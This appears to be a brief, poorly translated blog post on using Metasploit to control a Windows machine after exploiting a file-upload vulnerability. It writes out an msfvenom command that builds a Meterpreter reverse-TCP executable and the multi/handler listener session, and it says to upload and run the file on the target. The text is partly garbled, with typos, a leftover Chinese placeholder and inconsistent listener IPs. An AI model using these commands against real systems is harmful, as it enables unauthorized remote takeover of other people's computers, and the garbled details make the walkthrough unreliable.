kaili of metasploit control server using the upload vulnerability

Metasploit shellcode is used in the windows of

Generate shell.exe

msfvenom -p windows/meterpreter/reverse_tcp lhost=222.222.221.140 lport=1211 -f exe > /root/shell.exe

Listening shellcode

msf > use exploit/multi/handler 
msf exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(multi/handler) > set lhost kali的ip
lhost => 192.168.152.131
msf exploit(multi/handler) > set lport 1211
lport => 1211
msf exploit(multi/handler) > exploit 
[*] Started reverse TCP handler on 222.222.221.140:1211 

The resulting sehllcode uploaded to the windows host and run

Suggesting the return to control the other computer, linux server the same as the operation

reference

https://blog.csdn.net/strom2418/article/details/50393621

https://blog.csdn.net/weixin_39190897/article/details/86771918

 

Guess you like

Origin www.cnblogs.com/aeolian/p/11041052.html